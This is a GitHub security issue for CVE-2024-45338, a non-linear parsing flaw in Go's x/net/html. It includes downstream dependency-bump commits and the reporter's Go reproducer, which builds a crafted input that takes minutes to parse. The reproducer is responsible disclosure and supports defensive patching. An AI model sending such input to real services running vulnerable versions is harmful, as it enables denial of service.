Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

x/net/html: non-linear parsing of case-insensitive content #70906

Closed
rolandshoemaker opened this issue Dec 18, 2024 · 3 comments
Closed

x/net/html: non-linear parsing of case-insensitive content #70906

rolandshoemaker opened this issue Dec 18, 2024 · 3 comments
Labels
NeedsFix The path to resolution is known, but the work has not been done. Security
Milestone
Unreleased

Comments

@rolandshoemaker
Copy link
Member

rolandshoemaker commented Dec 18, 2024
edited
Loading

An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.

Thanks to Guido Vranken for reporting this issue.

This is CVE-2024-45338.
@gabyhelp

This comment was marked as off-topic.

Sign in to view
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/637536 mentions this issue: html: use strings.EqualFold instead of lowering ourselves

@dmitshur dmitshur added the NeedsFix The path to resolution is known, but the work has not been done. label Dec 18, 2024
@dmitshur dmitshur added this to the Unreleased milestone Dec 18, 2024
@rolandshoemaker rolandshoemaker changed the title security: fix CVE-2024-45338 x/net/html: non-linear parsing of case-insensitive content Dec 18, 2024
@github-actions github-actions bot mentioned this issue Dec 19, 2024
Closed
@ckcr4lyf ckcr4lyf mentioned this issue Dec 19, 2024
Open
@github-actions github-actions bot mentioned this issue Dec 19, 2024
Open
@FObersteiner FObersteiner mentioned this issue Dec 19, 2024
Open
@chrisd8088 chrisd8088 mentioned this issue Dec 19, 2024
Closed
@dannycjones dannycjones mentioned this issue Dec 19, 2024
Merged
glours added a commit to glours/compose that referenced this issue Dec 19, 2024
@glours
bump golang.org/x/net to v0.33.0 to fix potential security issue
e83070c 
golang/go#70906

Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>
@glours glours mentioned this issue Dec 19, 2024
Open
@weppos weppos mentioned this issue Dec 19, 2024
Open
brianmcarey added a commit to brianmcarey/kubevirt that referenced this issue Dec 19, 2024
@brianmcarey
deps: Update golang.org/x/net to v0.33.0 to resolve high vulnerability
dbde717 
A high vulnerability(CVE-2024-45338)[1] is resolved in golang.org/x/net
v0.33.0[2]

Update to this verion.

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338
[2] golang/go#70906

Signed-off-by: Brian Carey <bcarey@redhat.com>
@brianmcarey brianmcarey mentioned this issue Dec 19, 2024
Merged
8 tasks
unexge pushed a commit to awslabs/mountpoint-s3-csi-driver that referenced this issue Dec 19, 2024
@dannycjones
Update dependency x/net/html (#323)
8234ec1 
*Issue #, if available:* golang/go#70906

*Description of changes:*

This change updates the version of the net/html package provided by the
Golang project.

By submitting this pull request, I confirm that you can use, modify,
copy, and redistribute this contribution, under the terms of your
choice.

Signed-off-by: Daniel Carl Jones <djonesoa@amazon.com>
haaag added a commit to haaag/gm that referenced this issue Dec 19, 2024
@haaag
fix: bump golang.org/x/net -> v0.33.0 vulnerable CVE-2024-45338
6f3b109 
Reference:
- [CVE-2024-45338](GHSA-w32m-9786-jp63)
- [x/net/html: non-linear parsing of case-insensitive content
  golang/go#70906](golang/go#70906)
@mbobrovskyi mbobrovskyi mentioned this issue Dec 19, 2024
Merged
This was referenced Dec 19, 2024
Open
Open
Open
@chrisd8088 chrisd8088 mentioned this issue Dec 20, 2024
Merged
@github-actions github-actions bot mentioned this issue Dec 20, 2024
Open
@dims dims mentioned this issue Dec 20, 2024
Open
@guidovranken
Copy link

The following reproducer prints the execution time of html.Parse() to process 1, 2, 4, 8, 16, 32, 64, 128, 256, 512 and 1024 kilobytes of crafted input.

package main

import (
    "golang.org/x/net/html"
    "strings"
    "bytes"
    "fmt"
    "time"
)

func generate(size int) []byte {
    size1 := size / 2
    size2 := size / 8
    out := []byte("<math><Annotation-xml encoding=")
    out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
    out = append(out, bytes.Repeat([]byte("><</"), size2)...)
    return out
}

func main() {
    for kb := 1; kb <= 1024; kb *= 2 {
        data := generate(1024 * kb)
        start := time.Now()
        html.Parse(strings.NewReader(string(data)))
        duration := time.Since(start)
        fmt.Printf("Parsing %d kb took %s\n", kb, duration)
    }
}

Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz)

Parsing 1 kb took 3.08939ms
Parsing 2 kb took 11.730778ms
Parsing 4 kb took 37.71703ms
Parsing 8 kb took 146.944095ms
Parsing 16 kb took 605.988269ms
Parsing 32 kb took 2.341168259s
Parsing 64 kb took 9.875122735s
Parsing 128 kb took 41.930787863s
Parsing 256 kb took 2m59.680417561s
Parsing 512 kb took 12m2.349134038s
Parsing 1024 kb took 47m38.232269575s

@github-actions github-actions bot mentioned this issue Dec 21, 2024
Open
@github-actions github-actions bot mentioned this issue Dec 22, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
NeedsFix The path to resolution is known, but the work has not been done. Security
Projects
None yet
Milestone
Unreleased
Development

No branches or pull requests
5 participants
@dmitshur @rolandshoemaker @guidovranken @gopherbot @gabyhelp